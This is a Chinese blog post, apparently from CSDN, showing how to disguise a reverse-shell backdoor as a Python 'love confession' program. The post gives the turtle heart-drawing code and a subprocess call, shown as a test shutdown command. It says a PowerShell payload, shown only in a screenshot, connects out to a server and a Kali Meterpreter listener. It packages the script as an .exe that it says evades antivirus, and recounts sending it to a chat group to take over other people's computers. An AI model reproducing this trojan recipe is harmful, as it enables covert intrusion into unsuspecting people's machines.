kali 查看已经打开的程序_powershell后门绑定py表白程序

c68ec84fd16f0a927d81154b059f16ee.png
人生一世,草木一秋 —— 冯梦龙

思路:

用python写一个表白程序

表白程序运行的同时

调用系统命令执行我们有后门的powershell代码

从而控制对方的主机

至于powershell后门代码的制作这里不再赘述,参考powershell攻击思路

frp内网穿透参考frp内网穿透

道理大家都懂,咋们开始实操

奈何笔者python水平马马虎虎,借用csdn大佬的代码走一波

代码地址

https://blog.csdn.net/weixin_43336281/article/details/86846792​blog.csdn.net
from turtle import *
color('black','red')
begin_fill()
penup()
goto (50,50)
pendown()
right(45)
goto(100,0)
left(90)
fd(120)
circle(50,225)
penup()
goto(0,0)
pendown()
left(135)
fd(120)
circle(50,225)
seth(90)
circle(50,225)
fd(121)
end_fill()
left(56)
penup()
goto(-210,40)
pendown()
goto(0,80)
penup()
goto(160,110)
pendown()
goto(320,140)
done()

当运行代码,会画个爱心,么么哒

09aacfe7c081baeae7f768d5fd2eb910.png

接下来尝试使用python模块调用执行系统命令

在IDLE里重新打开一个窗口

输入如下代码,验证是否能执行关机命令

import subprocess
cmd = "shutdown -s -t 60"
res = subprocess.call(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE)

8a3b73ed1689cb6640560b7b08d1c836.png

F5运行

84dfd5ccd8ffdb7e152324e8ed266f9e.png

接下来我们将关机代码换成准备好的powershell后门代码

然后将系统指令代码和表白程序的代码合并(import subprocess已放在顶部)

33876855ed5f8d754388ed5202339a1f.png

如图,红框内的代码是重点,是刚才我们执行系统指令的代码

绿框内的代码就是我准备好的powershell代码

此powershell代码一旦执行,会连接到我指定的公网服务器的的指定端口

再由公网服务器转发到内网的kali上

至此,代码部分已经完成

保存此脚本,后缀名为.py

当然你要问了

对方电脑没有python环境,你还怎么执行

650f42b6d91d4c944ccb6b53e590f3cf.png

所以为了让没有安装python环境的朋友也能运行此脚本

需将将此脚本打包成exe的可执行文件

安装pyinstaller,打开cmd执行如下命令

pip install pyinstaller

为了让程序好看一点,去网上下载个ico图标

开始打包

pyinstaller -F -i c1.ico biaobai.py

其中-i 是指定ico图标

4510183e4774f08f224f612cdaa1b78f.png

接下来会生成3个文件夹,可执行文件在dist文件夹里

3c5a373e8842c6557d1856c1cbc65366.png

打开dist

026fdf9bf01f5ea9527d93de4f32477e.png

将程序复制到靶机

windows defender和腾讯管家并不会报毒

42347b1e6151e357d03fcb8252925fe4.png

打开kali ,设置好监听

e2a3421a7eb3a38e10c992922d4b505a.png

双击表白程序

219565c7896a4320ccab345c5dd2457c.png

I LOVE YOU

480febcc31c2ff9d12072660bf5db83c.png

当利箭穿过心脏

将你和她的心紧紧的连在一起

你们永远永远不分离

但是,这,不是重点

重点是,你已经拿到了对方电脑的控制权

因为kali已经收到了meterpreter的会话

f41fb5e51e24dcc35fe9fd3837cac076.png

是时候发给女朋友了测试一下了

等等,我哪有女朋友?

14414e05035986496e17f6dc52c2c8bb.png

还是发到群里给广大单身狗一个机会

0c434fb02997a6bf581c417442422a7d.png

kali开始继续监听

一想到马上就能控制别人的电脑,开始有点激动了

a78859836a750dd21442aab5e92de63c.png

结果等了半天,没有一点反映

我忍不住问问群里的小伙子小妹妹怎么不点开看看

送给男盆友女盆友什么的

结果他们给我来一句,不敢点开

e38d4d50c48bc521f13bf520397ff212.png

现在的年亲人都这么没点好奇心!

活该单身,活该找不到女朋友

等不及了,关掉kali

不奉陪了!

后话:

以上操作只是给大家证明一个道理

我国国民网络安全素质全面提高

大家都不会轻易点击安装来历不明的软件

多年安全教育,换来如此安全意识

可歌可泣,很是欣慰

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值